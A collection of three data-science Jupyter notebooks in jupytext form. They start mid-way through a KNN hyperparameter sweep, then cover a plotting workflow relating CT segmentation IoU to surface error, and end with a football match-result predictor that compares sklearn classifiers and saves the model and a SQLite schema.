# + tags=[]
# Log-scale sweep on n-gram TF-IDF features.
for k in tqdm([1, 10, 100, 1000]):
    fold_scores = cross_val_score(KNeighborsClassifier(k), affr_ngram_tfidf_500[10000:20000], Scr[10000:20000], cv=5)
    print(fold_scores.mean())

# + tags=[]
# Finer sweep on a 3k n-gram TF-IDF slice.
k_grid = range(1, 400, 50)
for k in tqdm(k_grid):
    fold_scores = cross_val_score(KNeighborsClassifier(k), affr_ngram_tfidf_500[10000:13000], Scr[10000:13000], cv=5)
    print(fold_scores.mean())
# -

# - ### Implementing knn for the data set by <NAME>.

kdata = pd.read_csv('../datafiles/knn_keril.csv')
kdata['Purchased'].value_counts()

# Two feature columns, binary 'Purchased' target; no rebalancing, with feature scaling.
kknn = Knn(kdata.iloc[:, :2], kdata.iloc[:, 2], balance=0, scale=1)

# + tags=[]
kknn.KNN_KCV()
# -

kknn.recent_score()

# + tags=[]
# NOTE(review): KNN_TS is passed balance/scale kwargs here — confirm its signature
# actually accepts them (the constructor is where they are normally supplied).
kknn.KNN_TS(hyper=list(range(1, 50)), balance=0, scale=1)
# -

kknn.recent_score()

# > This analysis is from the kknn.KNN_KCV model

kknn.Plot_CV_scrs()

kknn.Plot_CV_roc_score()

kknn.Plot_roc()

kknn.Confusion_mat()
ML Notebooks/AFFR_KNN.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python tf>=2.0
#     language: python
#     name: tf2gpu
# ---

# ## Surface Determination Workflow

import numpy as np
import matplotlib.pyplot as plt
import os
import h5py
import sys
import pandas as pd
import seaborn as sns

# Shared plot styling for every figure below.
sns.set_style(style = 'darkgrid')
sns.set(font_scale = 1.2)

psize = (16, 16, 16)
size_lab = '16x16'
pixel_size = 1.51  # assumed micrometres per pixel — TODO confirm against scan metadata

# Morphological-resolution study: relate segmentation IoU to surface error.
df = pd.read_csv('/home/atekawade/Dropbox/Arg/transfers/ZEISS_v2/morpho_resolution.csv')
df['radius-um'] = pixel_size * df['radius']

# Linear fit of |radius error| (um) vs IoU; reused below to convert IoU -> surface error.
fit_coeffs = np.polyfit(df['iou'], np.abs(df['radius-um']), 1)
iou_to_error = np.poly1d(fit_coeffs)

fig, ax = plt.subplots(1, 1, figsize = (8, 6))
ax.scatter(df['iou'], np.abs(df['radius-um']))
iou_grid = np.linspace(min(df['iou']), max(df['iou']), 10)
ax.plot(iou_grid, iou_to_error(iou_grid), '--')
ax.set_xlabel('IoU accuracy')
ax.set_ylabel('surface error (${\mu}m$)')

# ## IoU vs X

df = pd.read_csv('/home/atekawade/Dropbox/Arg/transfers/ZEISS_v2/stats.csv')
se = 'surface-error (${\mu}m$)'
# Map each model's IoU through the fit above to an estimated surface error.
df[se] = iou_to_error(np.asarray(df['IoU']))
df = df[df['SURF-model'] == 3]

# +
fig, ax = plt.subplots(1, 1, figsize = (8, 6))

# FDK reconstructions: scatter points plus a linear trend line.
fdk = df[df['CT-algo'] == 'FDK']
fdk.plot.scatter(x = 'X', y = se, c = 'red', marker = 'x', ax = ax, s = 30, label = 'FDK')
trend = np.poly1d(np.polyfit(fdk['X'], fdk[se], 1))
x_grid = np.linspace(1, 10, 10, endpoint=True)
ax.plot(x_grid, trend(x_grid), '--')

# DR reconstructions, same treatment.
dr = df[df['CT-algo'] == 'DR']
dr.plot.scatter(x = 'X', y = se, c = 'blue', marker = 'o', ax = ax, s = 30, label = 'DR')
trend = np.poly1d(np.polyfit(dr['X'], dr[se], 1))
ax.plot(x_grid, trend(x_grid), '--')

ax.legend()
ax.set_xlabel("X - reduction in scan time")
# -

df

# +
# df.to_csv('/home/atekawade/Dropbox/Arg/transfers/ZEISS_v2/stats_all.csv')
# -

#
scratchpad/surface_determination/notebooks/make_plots.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# ## Football Predictor Model
# In this notebook we develop a football match result predictor from scratch with the
# sklearn library, testing different models and comparing the performance of each one.
# The idea is then to use this model in a more complex system and create a REST API.

# ## Load, clean and transform data

import numpy as np
import matplotlib.pyplot as plt
from matplotlib.ticker import NullFormatter
import pandas as pd
import matplotlib.ticker as ticker
from sklearn import preprocessing
from sklearn import metrics

df = pd.read_csv('dataset.csv')
df.head()

# Label every match from the home team's point of view.
df['result'] = df.apply(
    lambda x: 'wins' if x.home_score > x.away_score
    else 'loses' if x.home_score < x.away_score
    else 'draws',
    axis=1)
df.head()

# Assign a stable 1-based integer id to every team appearing on either side.
teams = list(dict.fromkeys(df['home_team'].values.tolist() + df['away_team'].values.tolist()))
dic = {teams[i]: (i + 1) for i in range(len(teams))}
df['home_team_id'] = df['home_team'].map(dic)
df['away_team_id'] = df['away_team'].map(dic)
df.head()

# Features are just the two team ids; the target is the textual result.
X = df[['home_team_id', 'away_team_id']].values
X[0:5]

y = df['result'].values
y[0:5]

# +
from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=4)
print('Train set:', X_train.shape, y_train.shape)
print('Test set:', X_test.shape, y_test.shape)

# Parallel lists of (classifier name, best accuracy) for the final comparison chart.
classifier = []
accuracy = []
# -

# ## Compare classifiers

# +
from sklearn.neighbors import KNeighborsClassifier

MAX_K = 50
mean_acc = np.zeros(MAX_K - 1)
std_acc = np.zeros(MAX_K - 1)
for n in range(1, MAX_K):
    # Train a model with K = n and measure its test-set accuracy.
    model = KNeighborsClassifier(n_neighbors=n).fit(X_train, y_train)
    yhat = model.predict(X_test)
    mean_acc[n - 1] = metrics.accuracy_score(y_test, yhat)
    std_acc[n - 1] = np.std(yhat == y_test) / np.sqrt(yhat.shape[0])

# Plot accuracy vs K and keep the best K.
plt.plot(range(1, MAX_K), mean_acc, 'g')
plt.fill_between(range(1, MAX_K), mean_acc - 1 * std_acc, mean_acc + 1 * std_acc, alpha=0.10)
plt.legend(('Accuracy ', '+/- 1xstd'))  # FIX: the shaded band is +/- 1 std, not 3
plt.ylabel('Accuracy ')
plt.xlabel('Number of Neighbors (K)')  # FIX: typo "Nabors"
plt.tight_layout()
plt.show()

print("The best accuracy was with", mean_acc.max(), "with k=", mean_acc.argmax() + 1)
KNN_K = mean_acc.argmax() + 1
KNN = KNeighborsClassifier(n_neighbors=KNN_K).fit(X_train, y_train)
classifier.append("KNeighborsClassifier")
accuracy.append(mean_acc.max())
# +
from sklearn.tree import DecisionTreeClassifier

MAX_DEPTH = 50
# FIX: these arrays were sized with MAX_K; that only worked because MAX_K == MAX_DEPTH.
mean_acc = np.zeros(MAX_DEPTH - 1)
std_acc = np.zeros(MAX_DEPTH - 1)
for n in range(1, MAX_DEPTH):
    # Train a model with max depth = n and measure its test-set accuracy.
    model = DecisionTreeClassifier(criterion="entropy", max_depth=n).fit(X_train, y_train)
    yhat = model.predict(X_test)
    mean_acc[n - 1] = metrics.accuracy_score(y_test, yhat)
    std_acc[n - 1] = np.std(yhat == y_test) / np.sqrt(yhat.shape[0])

# Plot accuracy vs depth and keep the best depth.
plt.plot(range(1, MAX_DEPTH), mean_acc, 'g')
plt.fill_between(range(1, MAX_DEPTH), mean_acc - 1 * std_acc, mean_acc + 1 * std_acc, alpha=0.10)
plt.legend(('Accuracy ', '+/- 1xstd'))  # FIX: the shaded band is +/- 1 std, not 3
plt.ylabel('Accuracy ')
plt.xlabel('Max depth (K)')
plt.tight_layout()
plt.show()

print("The best accuracy was with", mean_acc.max(), "with depth=", mean_acc.argmax() + 1)
DT_DEPTH = mean_acc.argmax() + 1
DT = DecisionTreeClassifier(criterion="entropy", max_depth=DT_DEPTH).fit(X_train, y_train)
classifier.append("DecisionTreeClassifier")
accuracy.append(mean_acc.max())
# +
from sklearn.linear_model import LogisticRegression

MAX_C = 50
# Sweep the regularization strength C over 0.01 .. 0.49 for two solvers.
mean_acc_liblinear = np.zeros(MAX_C - 1)
for n in range(1, MAX_C):
    lr = LogisticRegression(C=(n / 100), solver='liblinear').fit(X_train, y_train)
    yhat = lr.predict(X_test)
    mean_acc_liblinear[n - 1] = metrics.accuracy_score(y_test, yhat)

mean_acc_sag = np.zeros(MAX_C - 1)
for n in range(1, MAX_C):
    # NOTE(review): 'sag' generally needs scaled features and/or a larger max_iter to
    # converge; on raw team ids it may stop early with a ConvergenceWarning — confirm.
    lr = LogisticRegression(C=(n / 100), solver='sag').fit(X_train, y_train)
    yhat = lr.predict(X_test)
    mean_acc_sag[n - 1] = metrics.accuracy_score(y_test, yhat)

# Compare the two solvers and keep liblinear's best accuracy for the summary.
plt.plot(range(1, MAX_C), mean_acc_liblinear, 'g')
plt.plot(range(1, MAX_C), mean_acc_sag, 'b')
plt.legend(('liblinear ', 'sag'))
plt.ylabel('Accuracy ')
plt.xlabel('Regularization (C)')
plt.tight_layout()
plt.show()

print("The best accuracy liblinear was with", mean_acc_liblinear.max(), "with C=", (mean_acc_liblinear.argmax() + 1) / 100)
print("The best accuracy sag was with", mean_acc_sag.max(), "with C=", (mean_acc_sag.argmax() + 1) / 100)
classifier.append("LogisticRegression")
accuracy.append(mean_acc_liblinear.max())
# +
from sklearn.ensemble import RandomForestClassifier

RF = RandomForestClassifier(n_estimators=200, random_state=1, class_weight='balanced')
RF.fit(X_train, y_train)
yhat = RF.predict(X_test)
mean_acc = metrics.accuracy_score(y_test, yhat)
print("Accuracy RandomForest was", mean_acc)
classifier.append("RandomForestClassifier")
accuracy.append(mean_acc)
# +
from sklearn.ensemble import AdaBoostClassifier

AB = AdaBoostClassifier(n_estimators=200, random_state=2)
AB.fit(X_train, y_train)
yhat = AB.predict(X_test)
mean_acc = metrics.accuracy_score(y_test, yhat)
print("Accuracy AdaBoost was", mean_acc)
classifier.append("AdaBoostClassifier")
accuracy.append(mean_acc)
# +
from sklearn.naive_bayes import GaussianNB

GNB = GaussianNB()
GNB.fit(X_train, y_train)
yhat = GNB.predict(X_test)
mean_acc = metrics.accuracy_score(y_test, yhat)
print("Accuracy GaussianNB was", mean_acc)
classifier.append("GaussianNB")
accuracy.append(mean_acc)
# +
# Summary bar chart of every classifier's best accuracy.
plt.rcdefaults()
y_pos = np.arange(len(classifier))
plt.barh(y_pos, accuracy, align='center', alpha=0.5)
plt.yticks(y_pos, classifier)
plt.xlabel('Accuracy')
plt.title('Classifier type')
# -

# Based on the results we adopt the following classifier for our football predictor model:

model = AdaBoostClassifier(n_estimators=200, random_state=2).fit(X_train, y_train)

# ## Test our model
# It is time to test our model. We first test it in a scenario that never occurs:
# a football match between Argentina and Galicia.
# <br> We expect Argentina to win this match :)

index = df.index[((df['home_team'] == 'Argentina') & (df['away_team'] == 'Galicia')) | (df['home_team'] == 'Galicia') & (df['away_team'] == 'Argentina')].tolist()
index

# We just verify that in our data this match never occurs.
# <br> It is time to play our virtual match!

home_team = dic['Argentina']
away_team = dic['Galicia']
print("Argentina team idx", home_team)
print("Galicia team idx", away_team)

x1 = [[home_team, away_team]]
yhat = model.predict(x1)
yhat

# Argentina wins! Now we could try with another, more realistic example.

home_team = dic['Paraguay']
away_team = dic['Argentina']
x1 = [[home_team, away_team]]
yhat = model.predict(x1)
yhat

# ## Save model and schema
# Here we save the model for future use and store the schema dictionary that we used to
# encode the teams.

import joblib  # FIX: sklearn.externals.joblib was removed in scikit-learn 0.23
import sqlite3

# Save model
joblib.dump(model, 'football_predictor_model.pkl')

# Create schema. The database file is created next to this script.
conn = sqlite3.connect('football.db')
c = conn.cursor()

c.execute('''
DROP TABLE IF EXISTS results;
''')
c.execute('''
DROP TABLE IF EXISTS teams;
''')
c.execute('''CREATE TABLE teams(
    [id] INTEGER PRIMARY KEY NOT NULL,
    [country] TEXT NOT NULL
)
''')
c.execute('''CREATE TABLE results(
    [home_team_id] INTEGER REFERENCES teams(id) NOT NULL,
    [away_team_id] INTEGER REFERENCES teams(id) NOT NULL,
    [home_score] INTEGER NOT NULL,
    [away_score] INTEGER NOT NULL,
    [result] TEXT NOT NULL
)
''')

# NOTE(review): to_sql(..., if_exists='replace') drops and recreates both tables, so the
# PRIMARY KEY / REFERENCES constraints declared above are discarded. Use
# if_exists='append' if the hand-written schema should be kept — confirm intent.

# Save dictionary
teams_df = pd.DataFrame(dic.items(), columns=['country', 'id'])
teams_df.head()
teams_df.to_sql('teams', conn, if_exists='replace', index=False)

# Save results
results_df = df[['home_team_id', 'away_team_id', 'home_score', 'away_score', 'result']]
results_df.head()
results_df.to_sql('results', conn, if_exists='replace', index=False)

# Flush everything to disk and release the file handle.
conn.commit()
conn.close()

# ## Conclusion
# There is a lot of optimization work left for this football model; it needs more
# features to reach better performance.
# <br> The idea was to compare different classifiers and obtain a model to use in
# future works.
# <br> Next, this model will be used in a REST API to serve predictions.
football_predictor.ipynb